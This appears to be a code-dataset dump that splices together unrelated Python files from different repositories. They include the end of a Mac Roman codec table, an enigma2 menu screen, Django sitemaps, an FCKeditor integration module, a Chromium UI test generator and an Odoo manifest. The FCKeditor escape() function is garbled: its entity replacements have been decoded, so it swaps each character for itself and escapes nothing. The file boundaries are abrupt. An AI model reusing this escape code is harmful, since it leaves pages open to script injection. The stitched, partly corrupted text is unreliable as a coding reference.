u'\t' # 0x09 -> CONTROL CHARACTER
u'\n' # 0x0A -> CONTROL CHARACTER
u'\x0b' # 0x0B -> CONTROL CHARACTER
u'\x0c' # 0x0C -> CONTROL CHARACTER
u'\r' # 0x0D -> CONTROL CHARACTER
u'\x0e' # 0x0E -> CONTROL CHARACTER
u'\x0f' # 0x0F -> CONTROL CHARACTER
u'\x10' # 0x10 -> CONTROL CHARACTER
u'\x11' # 0x11 -> CONTROL CHARACTER
u'\x12' # 0x12 -> CONTROL CHARACTER
u'\x13' # 0x13 -> CONTROL CHARACTER
u'\x14' # 0x14 -> CONTROL CHARACTER
u'\x15' # 0x15 -> CONTROL CHARACTER
u'\x16' # 0x16 -> CONTROL CHARACTER
u'\x17' # 0x17 -> CONTROL CHARACTER
u'\x18' # 0x18 -> CONTROL CHARACTER
u'\x19' # 0x19 -> CONTROL CHARACTER
u'\x1a' # 0x1A -> CONTROL CHARACTER
u'\x1b' # 0x1B -> CONTROL CHARACTER
u'\x1c' # 0x1C -> CONTROL CHARACTER
u'\x1d' # 0x1D -> CONTROL CHARACTER
u'\x1e' # 0x1E -> CONTROL CHARACTER
u'\x1f' # 0x1F -> CONTROL CHARACTER
u' ' # 0x20 -> SPACE
u'!' # 0x21 -> EXCLAMATION MARK
u'"' # 0x22 -> QUOTATION MARK
u'#' # 0x23 -> NUMBER SIGN
u'$' # 0x24 -> DOLLAR SIGN
u'%' # 0x25 -> PERCENT SIGN
u'&' # 0x26 -> AMPERSAND
u"'" # 0x27 -> APOSTROPHE
u'(' # 0x28 -> LEFT PARENTHESIS
u')' # 0x29 -> RIGHT PARENTHESIS
u'*' # 0x2A -> ASTERISK
u'+' # 0x2B -> PLUS SIGN
u',' # 0x2C -> COMMA
u'-' # 0x2D -> HYPHEN-MINUS
u'.' # 0x2E -> FULL STOP
u'/' # 0x2F -> SOLIDUS
u'0' # 0x30 -> DIGIT ZERO
u'1' # 0x31 -> DIGIT ONE
u'2' # 0x32 -> DIGIT TWO
u'3' # 0x33 -> DIGIT THREE
u'4' # 0x34 -> DIGIT FOUR
u'5' # 0x35 -> DIGIT FIVE
u'6' # 0x36 -> DIGIT SIX
u'7' # 0x37 -> DIGIT SEVEN
u'8' # 0x38 -> DIGIT EIGHT
u'9' # 0x39 -> DIGIT NINE
u':' # 0x3A -> COLON
u';' # 0x3B -> SEMICOLON
u'<' # 0x3C -> LESS-THAN SIGN
u'=' # 0x3D -> EQUALS SIGN
u'>' # 0x3E -> GREATER-THAN SIGN
u'?' # 0x3F -> QUESTION MARK
u'@' # 0x40 -> COMMERCIAL AT
u'A' # 0x41 -> LATIN CAPITAL LETTER A
u'B' # 0x42 -> LATIN CAPITAL LETTER B
u'C' # 0x43 -> LATIN CAPITAL LETTER C
u'D' # 0x44 -> LATIN CAPITAL LETTER D
u'E' # 0x45 -> LATIN CAPITAL LETTER E
u'F' # 0x46 -> LATIN CAPITAL LETTER F
u'G' # 0x47 -> LATIN CAPITAL LETTER G
u'H' # 0x48 -> LATIN CAPITAL LETTER H
u'I' # 0x49 -> LATIN CAPITAL LETTER I
u'J' # 0x4A -> LATIN CAPITAL LETTER J
u'K' # 0x4B -> LATIN CAPITAL LETTER K
u'L' # 0x4C -> LATIN CAPITAL LETTER L
u'M' # 0x4D -> LATIN CAPITAL LETTER M
u'N' # 0x4E -> LATIN CAPITAL LETTER N
u'O' # 0x4F -> LATIN CAPITAL LETTER O
u'P' # 0x50 -> LATIN CAPITAL LETTER P
u'Q' # 0x51 -> LATIN CAPITAL LETTER Q
u'R' # 0x52 -> LATIN CAPITAL LETTER R
u'S' # 0x53 -> LATIN CAPITAL LETTER S
u'T' # 0x54 -> LATIN CAPITAL LETTER T
u'U' # 0x55 -> LATIN CAPITAL LETTER U
u'V' # 0x56 -> LATIN CAPITAL LETTER V
u'W' # 0x57 -> LATIN CAPITAL LETTER W
u'X' # 0x58 -> LATIN CAPITAL LETTER X
u'Y' # 0x59 -> LATIN CAPITAL LETTER Y
u'Z' # 0x5A -> LATIN CAPITAL LETTER Z
u'[' # 0x5B -> LEFT SQUARE BRACKET
u'\\' # 0x5C -> REVERSE SOLIDUS
u']' # 0x5D -> RIGHT SQUARE BRACKET
u'^' # 0x5E -> CIRCUMFLEX ACCENT
u'_' # 0x5F -> LOW LINE
u'`' # 0x60 -> GRAVE ACCENT
u'a' # 0x61 -> LATIN SMALL LETTER A
u'b' # 0x62 -> LATIN SMALL LETTER B
u'c' # 0x63 -> LATIN SMALL LETTER C
u'd' # 0x64 -> LATIN SMALL LETTER D
u'e' # 0x65 -> LATIN SMALL LETTER E
u'f' # 0x66 -> LATIN SMALL LETTER F
u'g' # 0x67 -> LATIN SMALL LETTER G
u'h' # 0x68 -> LATIN SMALL LETTER H
u'i' # 0x69 -> LATIN SMALL LETTER I
u'j' # 0x6A -> LATIN SMALL LETTER J
u'k' # 0x6B -> LATIN SMALL LETTER K
u'l' # 0x6C -> LATIN SMALL LETTER L
u'm' # 0x6D -> LATIN SMALL LETTER M
u'n' # 0x6E -> LATIN SMALL LETTER N
u'o' # 0x6F -> LATIN SMALL LETTER O
u'p' # 0x70 -> LATIN SMALL LETTER P
u'q' # 0x71 -> LATIN SMALL LETTER Q
u'r' # 0x72 -> LATIN SMALL LETTER R
u's' # 0x73 -> LATIN SMALL LETTER S
u't' # 0x74 -> LATIN SMALL LETTER T
u'u' # 0x75 -> LATIN SMALL LETTER U
u'v' # 0x76 -> LATIN SMALL LETTER V
u'w' # 0x77 -> LATIN SMALL LETTER W
u'x' # 0x78 -> LATIN SMALL LETTER X
u'y' # 0x79 -> LATIN SMALL LETTER Y
u'z' # 0x7A -> LATIN SMALL LETTER Z
u'{' # 0x7B -> LEFT CURLY BRACKET
u'|' # 0x7C -> VERTICAL LINE
u'}' # 0x7D -> RIGHT CURLY BRACKET
u'~' # 0x7E -> TILDE
u'\x7f' # 0x7F -> CONTROL CHARACTER
u'\xc4' # 0x80 -> LATIN CAPITAL LETTER A WITH DIAERESIS
u'\xc5' # 0x81 -> LATIN CAPITAL LETTER A WITH RING ABOVE
u'\xc7' # 0x82 -> LATIN CAPITAL LETTER C WITH CEDILLA
u'\xc9' # 0x83 -> LATIN CAPITAL LETTER E WITH ACUTE
u'\xd1' # 0x84 -> LATIN CAPITAL LETTER N WITH TILDE
u'\xd6' # 0x85 -> LATIN CAPITAL LETTER O WITH DIAERESIS
u'\xdc' # 0x86 -> LATIN CAPITAL LETTER U WITH DIAERESIS
u'\xe1' # 0x87 -> LATIN SMALL LETTER A WITH ACUTE
u'\xe0' # 0x88 -> LATIN SMALL LETTER A WITH GRAVE
u'\xe2' # 0x89 -> LATIN SMALL LETTER A WITH CIRCUMFLEX
u'\xe4' # 0x8A -> LATIN SMALL LETTER A WITH DIAERESIS
u'\xe3' # 0x8B -> LATIN SMALL LETTER A WITH TILDE
u'\xe5' # 0x8C -> LATIN SMALL LETTER A WITH RING ABOVE
u'\xe7' # 0x8D -> LATIN SMALL LETTER C WITH CEDILLA
u'\xe9' # 0x8E -> LATIN SMALL LETTER E WITH ACUTE
u'\xe8' # 0x8F -> LATIN SMALL LETTER E WITH GRAVE
u'\xea' # 0x90 -> LATIN SMALL LETTER E WITH CIRCUMFLEX
u'\xeb' # 0x91 -> LATIN SMALL LETTER E WITH DIAERESIS
u'\xed' # 0x92 -> LATIN SMALL LETTER I WITH ACUTE
u'\xec' # 0x93 -> LATIN SMALL LETTER I WITH GRAVE
u'\xee' # 0x94 -> LATIN SMALL LETTER I WITH CIRCUMFLEX
u'\xef' # 0x95 -> LATIN SMALL LETTER I WITH DIAERESIS
u'\xf1' # 0x96 -> LATIN SMALL LETTER N WITH TILDE
u'\xf3' # 0x97 -> LATIN SMALL LETTER O WITH ACUTE
u'\xf2' # 0x98 -> LATIN SMALL LETTER O WITH GRAVE
u'\xf4' # 0x99 -> LATIN SMALL LETTER O WITH CIRCUMFLEX
u'\xf6' # 0x9A -> LATIN SMALL LETTER O WITH DIAERESIS
u'\xf5' # 0x9B -> LATIN SMALL LETTER O WITH TILDE
u'\xfa' # 0x9C -> LATIN SMALL LETTER U WITH ACUTE
u'\xf9' # 0x9D -> LATIN SMALL LETTER U WITH GRAVE
u'\xfb' # 0x9E -> LATIN SMALL LETTER U WITH CIRCUMFLEX
u'\xfc' # 0x9F -> LATIN SMALL LETTER U WITH DIAERESIS
u'\xdd' # 0xA0 -> LATIN CAPITAL LETTER Y WITH ACUTE
u'\xb0' # 0xA1 -> DEGREE SIGN
u'\xa2' # 0xA2 -> CENT SIGN
u'\xa3' # 0xA3 -> POUND SIGN
u'\xa7' # 0xA4 -> SECTION SIGN
u'\u2022' # 0xA5 -> BULLET
u'\xb6' # 0xA6 -> PILCROW SIGN
u'\xdf' # 0xA7 -> LATIN SMALL LETTER SHARP S
u'\xae' # 0xA8 -> REGISTERED SIGN
u'\xa9' # 0xA9 -> COPYRIGHT SIGN
u'\u2122' # 0xAA -> TRADE MARK SIGN
u'\xb4' # 0xAB -> ACUTE ACCENT
u'\xa8' # 0xAC -> DIAERESIS
u'\u2260' # 0xAD -> NOT EQUAL TO
u'\xc6' # 0xAE -> LATIN CAPITAL LETTER AE
u'\xd8' # 0xAF -> LATIN CAPITAL LETTER O WITH STROKE
u'\u221e' # 0xB0 -> INFINITY
u'\xb1' # 0xB1 -> PLUS-MINUS SIGN
u'\u2264' # 0xB2 -> LESS-THAN OR EQUAL TO
u'\u2265' # 0xB3 -> GREATER-THAN OR EQUAL TO
u'\xa5' # 0xB4 -> YEN SIGN
u'\xb5' # 0xB5 -> MICRO SIGN
u'\u2202' # 0xB6 -> PARTIAL DIFFERENTIAL
u'\u2211' # 0xB7 -> N-ARY SUMMATION
u'\u220f' # 0xB8 -> N-ARY PRODUCT
u'\u03c0' # 0xB9 -> GREEK SMALL LETTER PI
u'\u222b' # 0xBA -> INTEGRAL
u'\xaa' # 0xBB -> FEMININE ORDINAL INDICATOR
u'\xba' # 0xBC -> MASCULINE ORDINAL INDICATOR
u'\u03a9' # 0xBD -> GREEK CAPITAL LETTER OMEGA
u'\xe6' # 0xBE -> LATIN SMALL LETTER AE
u'\xf8' # 0xBF -> LATIN SMALL LETTER O WITH STROKE
u'\xbf' # 0xC0 -> INVERTED QUESTION MARK
u'\xa1' # 0xC1 -> INVERTED EXCLAMATION MARK
u'\xac' # 0xC2 -> NOT SIGN
u'\u221a' # 0xC3 -> SQUARE ROOT
u'\u0192' # 0xC4 -> LATIN SMALL LETTER F WITH HOOK
u'\u2248' # 0xC5 -> ALMOST EQUAL TO
u'\u2206' # 0xC6 -> INCREMENT
u'\xab' # 0xC7 -> LEFT-POINTING DOUBLE ANGLE QUOTATION MARK
u'\xbb' # 0xC8 -> RIGHT-POINTING DOUBLE ANGLE QUOTATION MARK
u'\u2026' # 0xC9 -> HORIZONTAL ELLIPSIS
u'\xa0' # 0xCA -> NO-BREAK SPACE
u'\xc0' # 0xCB -> LATIN CAPITAL LETTER A WITH GRAVE
u'\xc3' # 0xCC -> LATIN CAPITAL LETTER A WITH TILDE
u'\xd5' # 0xCD -> LATIN CAPITAL LETTER O WITH TILDE
u'\u0152' # 0xCE -> LATIN CAPITAL LIGATURE OE
u'\u0153' # 0xCF -> LATIN SMALL LIGATURE OE
u'\u2013' # 0xD0 -> EN DASH
u'\u2014' # 0xD1 -> EM DASH
u'\u201c' # 0xD2 -> LEFT DOUBLE QUOTATION MARK
u'\u201d' # 0xD3 -> RIGHT DOUBLE QUOTATION MARK
u'\u2018' # 0xD4 -> LEFT SINGLE QUOTATION MARK
u'\u2019' # 0xD5 -> RIGHT SINGLE QUOTATION MARK
u'\xf7' # 0xD6 -> DIVISION SIGN
u'\u25ca' # 0xD7 -> LOZENGE
u'\xff' # 0xD8 -> LATIN SMALL LETTER Y WITH DIAERESIS
u'\u0178' # 0xD9 -> LATIN CAPITAL LETTER Y WITH DIAERESIS
u'\u2044' # 0xDA -> FRACTION SLASH
u'\u20ac' # 0xDB -> EURO SIGN
u'\xd0' # 0xDC -> LATIN CAPITAL LETTER ETH
u'\xf0' # 0xDD -> LATIN SMALL LETTER ETH
u'\xde' # 0xDE -> LATIN CAPITAL LETTER THORN
u'\xfe' # 0xDF -> LATIN SMALL LETTER THORN
u'\xfd' # 0xE0 -> LATIN SMALL LETTER Y WITH ACUTE
u'\xb7' # 0xE1 -> MIDDLE DOT
u'\u201a' # 0xE2 -> SINGLE LOW-9 QUOTATION MARK
u'\u201e' # 0xE3 -> DOUBLE LOW-9 QUOTATION MARK
u'\u2030' # 0xE4 -> PER MILLE SIGN
u'\xc2' # 0xE5 -> LATIN CAPITAL LETTER A WITH CIRCUMFLEX
u'\xca' # 0xE6 -> LATIN CAPITAL LETTER E WITH CIRCUMFLEX
u'\xc1' # 0xE7 -> LATIN CAPITAL LETTER A WITH ACUTE
u'\xcb' # 0xE8 -> LATIN CAPITAL LETTER E WITH DIAERESIS
u'\xc8' # 0xE9 -> LATIN CAPITAL LETTER E WITH GRAVE
u'\xcd' # 0xEA -> LATIN CAPITAL LETTER I WITH ACUTE
u'\xce' # 0xEB -> LATIN CAPITAL LETTER I WITH CIRCUMFLEX
u'\xcf' # 0xEC -> LATIN CAPITAL LETTER I WITH DIAERESIS
u'\xcc' # 0xED -> LATIN CAPITAL LETTER I WITH GRAVE
u'\xd3' # 0xEE -> LATIN CAPITAL LETTER O WITH ACUTE
u'\xd4' # 0xEF -> LATIN CAPITAL LETTER O WITH CIRCUMFLEX
u'\uf8ff' # 0xF0 -> Apple logo
u'\xd2' # 0xF1 -> LATIN CAPITAL LETTER O WITH GRAVE
u'\xda' # 0xF2 -> LATIN CAPITAL LETTER U WITH ACUTE
u'\xdb' # 0xF3 -> LATIN CAPITAL LETTER U WITH CIRCUMFLEX
u'\xd9' # 0xF4 -> LATIN CAPITAL LETTER U WITH GRAVE
u'\u0131' # 0xF5 -> LATIN SMALL LETTER DOTLESS I
u'\u02c6' # 0xF6 -> MODIFIER LETTER CIRCUMFLEX ACCENT
u'\u02dc' # 0xF7 -> SMALL TILDE
u'\xaf' # 0xF8 -> MACRON
u'\u02d8' # 0xF9 -> BREVE
u'\u02d9' # 0xFA -> DOT ABOVE
u'\u02da' # 0xFB -> RING ABOVE
u'\xb8' # 0xFC -> CEDILLA
u'\u02dd' # 0xFD -> DOUBLE ACUTE ACCENT
u'\u02db' # 0xFE -> OGONEK
u'\u02c7' # 0xFF -> CARON
)
### Encoding table
encoding_table=codecs.charmap_build(decoding_table)
|
victor-lin/npact
|
refs/heads/acgt_gamma
|
pynpact/pynpact/softtimeout.py
|
2
|
import time
class Timeout(Exception):
"Exception raised by SoftTimer to indicate computation has taken too long."
def __init__(self, **args):
self.__dict__.update(args)
class SoftTimer(object):
"""This class keeps track of how long it has been around and a
timeout. If the timeout has passed when check is called, it raises
a Timeout exception"""
deadline = None
starttime = None
checkcount = 0
steps = None
def __init__(self, timeout=None, **kwargs):
self.set_timeout(timeout, from_now=True)
self.steps=[]
super(SoftTimer, self).__init__(**kwargs)
def set_timeout(self, timeout, from_now=False):
if from_now:
self.starttime = time.time()
if timeout and timeout > 0:
self.deadline = self.starttime + timeout
def check(self, step=None, logfn=None, **kwargs):
self.checkcount += 1
if step:
self.steps.append(step)
if logfn:
logfn("Checking for timeout, %d time: %r", self.checkcount, step)
t2 = time.time()
if self.deadline and t2 > self.deadline:
raise Timeout(tdiff=(t2 - self.starttime),
checkcount=self.checkcount,
steps = self.steps,
**kwargs)
|
Ophiuchus1312/enigma2-master
|
refs/heads/master
|
lib/python/Screens/Menu.py
|
1
|
from Screens.Screen import Screen
from Components.Sources.List import List
from Components.ActionMap import NumberActionMap
from Components.Sources.StaticText import StaticText
from Components.config import configfile
from Components.PluginComponent import plugins
from Components.config import config
from Components.SystemInfo import SystemInfo
from Tools.Directories import resolveFilename, SCOPE_SKIN
import xml.etree.cElementTree
from Screens.Setup import Setup, getSetupTitle
mainmenu = _("Main menu")
# read the menu
file = open(resolveFilename(SCOPE_SKIN, 'menu.xml'), 'r')
mdom = xml.etree.cElementTree.parse(file)
file.close()
class boundFunction:
def __init__(self, fnc, *args):
self.fnc = fnc
self.args = args
def __call__(self):
self.fnc(*self.args)
class MenuUpdater:
def __init__(self):
self.updatedMenuItems = {}
def addMenuItem(self, id, pos, text, module, screen, weight):
if not self.updatedMenuAvailable(id):
self.updatedMenuItems[id] = []
self.updatedMenuItems[id].append([text, pos, module, screen, weight])
def delMenuItem(self, id, pos, text, module, screen, weight):
self.updatedMenuItems[id].remove([text, pos, module, screen, weight])
def updatedMenuAvailable(self, id):
return self.updatedMenuItems.has_key(id)
def getUpdatedMenu(self, id):
return self.updatedMenuItems[id]
menuupdater = MenuUpdater()
class MenuSummary(Screen):
pass
class Menu(Screen):
ALLOW_SUSPEND = True
def okbuttonClick(self):
print "okbuttonClick"
selection = self["menu"].getCurrent()
if selection is not None:
selection[1]()
def execText(self, text):
exec text
def runScreen(self, arg):
# arg[0] is the module (as string)
# arg[1] is Screen inside this module
# plus possible arguments, as
# string (as we want to reference
# stuff which is just imported)
# FIXME. somehow
if arg[0] != "":
exec "from " + arg[0] + " import *"
self.openDialog(*eval(arg[1]))
def nothing(self): #dummy
pass
def openDialog(self, *dialog): # in every layer needed
self.session.openWithCallback(self.menuClosed, *dialog)
def openSetup(self, dialog):
self.session.openWithCallback(self.menuClosed, Setup, dialog)
def addMenu(self, destList, node):
requires = node.get("requires")
if requires:
if requires[0] == '!':
if SystemInfo.get(requires[1:], False):
return
elif not SystemInfo.get(requires, False):
return
MenuTitle = _(node.get("text", "??").encode("UTF-8"))
entryID = node.get("entryID", "undefined")
weight = node.get("weight", 50)
x = node.get("flushConfigOnClose")
if x:
a = boundFunction(self.session.openWithCallback, self.menuClosedWithConfigFlush, Menu, node)
else:
a = boundFunction(self.session.openWithCallback, self.menuClosed, Menu, node)
#TODO add check if !empty(node.childNodes)
destList.append((MenuTitle, a, entryID, weight))
def menuClosedWithConfigFlush(self, *res):
configfile.save()
self.menuClosed(*res)
def menuClosed(self, *res):
if res and res[0]:
self.close(True)
def addItem(self, destList, node):
requires = node.get("requires")
if requires:
if requires[0] == '!':
if SystemInfo.get(requires[1:], False):
return
elif not SystemInfo.get(requires, False):
return
item_text = node.get("text", "").encode("UTF-8")
entryID = node.get("entryID", "undefined")
weight = node.get("weight", 50)
for x in node:
if x.tag == 'screen':
module = x.get("module")
screen = x.get("screen")
if screen is None:
screen = module
print module, screen
if module:
module = "Screens." + module
else:
module = ""
# check for arguments. they will be appended to the
# openDialog call
args = x.text or ""
screen += ", " + args
destList.append((_(item_text or "??"), boundFunction(self.runScreen, (module, screen)), entryID, weight))
return
elif x.tag == 'code':
destList.append((_(item_text or "??"), boundFunction(self.execText, x.text), entryID, weight))
return
elif x.tag == 'setup':
id = x.get("id")
if item_text == "":
item_text = _(getSetupTitle(id))
else:
item_text = _(item_text)
destList.append((item_text, boundFunction(self.openSetup, id), entryID, weight))
return
destList.append((item_text, self.nothing, entryID, weight))
def __init__(self, session, parent):
Screen.__init__(self, session)
list = []
menuID = None
for x in parent: #walk through the actual nodelist
if not x.tag:
continue
if x.tag == 'item':
item_level = int(x.get("level", 0))
if item_level <= config.usage.setup_level.index:
self.addItem(list, x)
count += 1
elif x.tag == 'menu':
self.addMenu(list, x)
count += 1
elif x.tag == "id":
menuID = x.get("val")
count = 0
if menuID is not None:
# menuupdater?
if menuupdater.updatedMenuAvailable(menuID):
for x in menuupdater.getUpdatedMenu(menuID):
if x[1] == count:
list.append((x[0], boundFunction(self.runScreen, (x[2], x[3] + ", ")), x[4]))
count += 1
if menuID is not None:
# plugins
for l in plugins.getPluginsForMenu(menuID):
# check if a plugin overrides an existing menu
plugin_menuid = l[2]
for x in list:
if x[2] == plugin_menuid:
list.remove(x)
break
list.append((l[0], boundFunction(l[1], self.session), l[2], l[3] or 50))
# for the skin: first try a menu_<menuID>, then Menu
self.skinName = [ ]
if menuID is not None:
self.skinName.append("menu_" + menuID)
self.skinName.append("Menu")
# Sort by Weight
if config.usage.sort_menus.getValue():
list.sort()
else:
list.sort(key=lambda x: int(x[3]))
self["menu"] = List(list)
self["actions"] = NumberActionMap(["OkCancelActions", "MenuActions", "NumberActions"],
{
"ok": self.okbuttonClick,
"cancel": self.closeNonRecursive,
"menu": self.closeRecursive,
"1": self.keyNumberGlobal,
"2": self.keyNumberGlobal,
"3": self.keyNumberGlobal,
"4": self.keyNumberGlobal,
"5": self.keyNumberGlobal,
"6": self.keyNumberGlobal,
"7": self.keyNumberGlobal,
"8": self.keyNumberGlobal,
"9": self.keyNumberGlobal
})
a = parent.get("title", "").encode("UTF-8") or None
a = a and _(a)
if a is None:
a = _(parent.get("text", "").encode("UTF-8"))
self["title"] = StaticText(a)
Screen.setTitle(self, a)
self.menu_title = a
def keyNumberGlobal(self, number):
print "menu keyNumber:", number
# Calculate index
number -= 1
if len(self["menu"].list) > number:
self["menu"].setIndex(number)
self.okbuttonClick()
def closeNonRecursive(self):
self.close(False)
def closeRecursive(self):
self.close(True)
def createSummary(self):
return MenuSummary
class MainMenu(Menu):
#add file load functions for the xml-file
def __init__(self, *x):
self.skinName = "Menu"
Menu.__init__(self, *x)
|
ghickman/django
|
refs/heads/master
|
tests/gis_tests/geoapp/sitemaps.py
|
452
|
from django.contrib.gis.sitemaps import KMLSitemap, KMZSitemap
from .models import City, Country
sitemaps = {'kml': KMLSitemap([City, Country]),
'kmz': KMZSitemap([City, Country]),
}
|
CamilloBovio/Remote
|
refs/heads/master
|
modules/fckeditor/fckeditor/fckeditor.py
|
15
|
"""
FCKeditor - The text editor for Internet - http://www.fckeditor.net
Copyright (C) 2003-2010 Frederico Caldeira Knabben
== BEGIN LICENSE ==
Licensed under the terms of any of the following licenses at your
choice:
- GNU General Public License Version 2 or later (the "GPL")
http://www.gnu.org/licenses/gpl.html
- GNU Lesser General Public License Version 2.1 or later (the "LGPL")
http://www.gnu.org/licenses/lgpl.html
- Mozilla Public License Version 1.1 or later (the "MPL")
http://www.mozilla.org/MPL/MPL-1.1.html
== END LICENSE ==
This is the integration file for Python.
"""
import cgi
import os
import re
import string
def escape(text, replace=string.replace):
"""Converts the special characters '<', '>', and '&'.
RFC 1866 specifies that these characters be represented
in HTML as < > and & respectively. In Python
1.5 we use the new string.replace() function for speed.
"""
text = replace(text, '&', '&') # must be done 1st
text = replace(text, '<', '<')
text = replace(text, '>', '>')
text = replace(text, '"', '"')
text = replace(text, "'", ''')
return text
# The FCKeditor class
class FCKeditor(object):
def __init__(self, instanceName):
self.InstanceName = instanceName
self.BasePath = '/fckeditor/'
self.Width = '100%'
self.Height = '200'
self.ToolbarSet = 'Default'
self.Value = '';
self.Config = {}
def Create(self):
return self.CreateHtml()
def CreateHtml(self):
HtmlValue = escape(self.Value)
Html = ""
if (self.IsCompatible()):
File = "fckeditor.html"
Link = "%seditor/%s?InstanceName=%s" % (
self.BasePath,
File,
self.InstanceName
)
if (self.ToolbarSet is not None):
Link += "&Toolbar=%s" % self.ToolbarSet
# Render the linked hidden field
Html += "<input type=\"hidden\" id=\"%s\" name=\"%s\" value=\"%s\" style=\"display:none\" />" % (
self.InstanceName,
self.InstanceName,
HtmlValue
)
# Render the configurations hidden field
Html += "<input type=\"hidden\" id=\"%s___Config\" value=\"%s\" style=\"display:none\" />" % (
self.InstanceName,
self.GetConfigFieldString()
)
# Render the editor iframe
Html += "<iframe id=\"%s\__Frame\" src=\"%s\" width=\"%s\" height=\"%s\" frameborder=\"0\" scrolling=\"no\"></iframe>" % (
self.InstanceName,
Link,
self.Width,
self.Height
)
else:
if (self.Width.find("%%") < 0):
WidthCSS = "%spx" % self.Width
else:
WidthCSS = self.Width
if (self.Height.find("%%") < 0):
HeightCSS = "%spx" % self.Height
else:
HeightCSS = self.Height
Html += "<textarea name=\"%s\" rows=\"4\" cols=\"40\" style=\"width: %s; height: %s;\" wrap=\"virtual\">%s</textarea>" % (
self.InstanceName,
WidthCSS,
HeightCSS,
HtmlValue
)
return Html
def IsCompatible(self):
if (os.environ.has_key("HTTP_USER_AGENT")):
sAgent = os.environ.get("HTTP_USER_AGENT", "")
else:
sAgent = ""
if (sAgent.find("MSIE") >= 0) and (sAgent.find("mac") < 0) and (sAgent.find("Opera") < 0):
i = sAgent.find("MSIE")
iVersion = float(sAgent[i+5:i+5+3])
if (iVersion >= 5.5):
return True
return False
elif (sAgent.find("Gecko/") >= 0):
i = sAgent.find("Gecko/")
iVersion = int(sAgent[i+6:i+6+8])
if (iVersion >= 20030210):
return True
return False
elif (sAgent.find("Opera/") >= 0):
i = sAgent.find("Opera/")
iVersion = float(sAgent[i+6:i+6+4])
if (iVersion >= 9.5):
return True
return False
elif (sAgent.find("AppleWebKit/") >= 0):
p = re.compile('AppleWebKit\/(\d+)', re.IGNORECASE)
m = p.search(sAgent)
if (m.group(1) >= 522):
return True
return False
else:
return False
def GetConfigFieldString(self):
sParams = ""
bFirst = True
for sKey in self.Config.keys():
sValue = self.Config[sKey]
if (not bFirst):
sParams += "&"
else:
bFirst = False
if (sValue):
k = escape(sKey)
v = escape(sValue)
if (sValue == "true"):
sParams += "%s=true" % k
elif (sValue == "false"):
sParams += "%s=false" % k
else:
sParams += "%s=%s" % (k, v)
return sParams
|
timduru/platform-external-chromium_org
|
refs/heads/katkiss-4.4
|
chrome/tools/automated_ui_test_tools/ui_action_generator.py
|
52
|
#!/usr/bin/env python
# Copyright (c) 2011 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""A simple main function to print ui action sequences.
Action sequences are generated using chrome/test/functional/ui_model.py
and are output in the format required by automated_ui_tests build target.
Generate 100 command sequences to ui.txt:
ui_action_generator.py -o ui.txt -c 100
Generate 100 15-action-length sequences:
ui_action_generator.py -c 100 -a 15
Re-create command with seed 12345:
ui_action_generator.py -s 12345
"""
import optparse
import os
import sys
import xml.dom.minidom
def _AddTestPath():
"""Add chrome/test/functional to path to find script dependancies."""
script_dir = os.path.dirname(__file__)
chrome_dir = os.path.join(script_dir, os.pardir, os.pardir)
test_dir = os.path.join(chrome_dir, 'test', 'functional')
sys.path += [test_dir]
_AddTestPath()
import ui_model
def CreateUIActionList(actions_per_command, num_commands, given_seed=None):
"""Generate user-like pseudo-random action sequences.
Args:
actions_per_command: length of each ui action sequence.
num_commands: number of sequences to generate.
seed: optional rand seed for this list.
Returns:
XML format command list string, readable by automated_ui_tests.
"""
doc = xml.dom.minidom.Document()
command_list = doc.createElement('CommandList')
doc.appendChild(command_list)
for _ in xrange(num_commands):
command = doc.createElement('command')
command_list.appendChild(command)
seed = ui_model.Seed(given_seed)
command.setAttribute('seed', str(seed))
browser = ui_model.BrowserState()
for _ in xrange(actions_per_command):
action = ui_model.GetRandomAction(browser)
browser = ui_model.UpdateState(browser, action)
action_tuple = action.split(';')
action_element = doc.createElement(action_tuple[0])
if len(action_tuple) == 2:
action_element.setAttribute('url', action_tuple[1])
command.appendChild(action_element)
return doc.toprettyxml()
def ParseCommandLine():
"""Returns the list of options and their values, and unparsed args.
"""
parser = optparse.OptionParser()
parser.add_option('-o', '--output', dest='output_file', type='string',
action='store', default='ui_actions.txt',
help='the file to output the command list to')
parser.add_option('-c', '--num_commands', dest='num_commands',
type='int', action='store', default=1,
help='number of commands to output')
parser.add_option('-a', '--actions-per-command', dest='actions_per_command',
type='int', action='store', default=25,
help='number of actions per command')
parser.add_option('-s', '--seed', dest='seed', type='int', action='store',
default=None, help='generate action sequence using a seed')
return parser.parse_args()
def main():
"""Generate command list and write it out in xml format.
For use as input for automated_ui_tests build target.
"""
options, args = ParseCommandLine()
command_list = CreateUIActionList(options.actions_per_command,
options.num_commands,
options.seed)
f = open(options.output_file, 'w')
f.write(command_list)
f.close()
print command_list
return 0
if __name__ == '__main__':
sys.exit(main())
|
finoptimal/fo_bdc
|
refs/heads/master
|
setup.py
|
1
|
from setuptools import setup, find_packages
from glob import glob
setup(name='fo_bdc',
version='1.0',
description='Wrapper around Bill.com API',
# Note that the tests folder can only be 1 level deep!!!
scripts=glob('tests/*'),
py_modules=[],
packages=find_packages())
|
damiansoriano/odoo
|
refs/heads/master
|
addons/purchase_double_validation/__openerp__.py
|
62
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name' : 'Double Validation on Purchases',
'version' : '1.1',
'category': 'Purchase Management',
'images' : ['images/purchase_validation.jpeg'],
'depends' : ['base','purchase'],
'author' : 'OpenERP SA',
'description': """
Double-validation for purchases exceeding minimum amount.
=========================================================
This module modifies the purchase workflow in order to validate purchases that
exceeds minimum amount set by configuration wizard.
""",
'website': 'http://www.openerp.com',
'data': [
'purchase_double_validation_workflow.xml',
'purchase_double_validation_installer.xml',
'purchase_double_validation_view.xml',
],
'test': [
'test/purchase_double_validation_demo.yml',
'test/purchase_double_validation_test.yml'
],
'demo': [],
'installable': True,
'auto_install': False
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
mollstam/UnrealPy
|
refs/heads/master
|
UnrealPyEmbed/Source/Python/Lib/python27/SocketServer.py
|
33
|
"""Generic socket server classes.
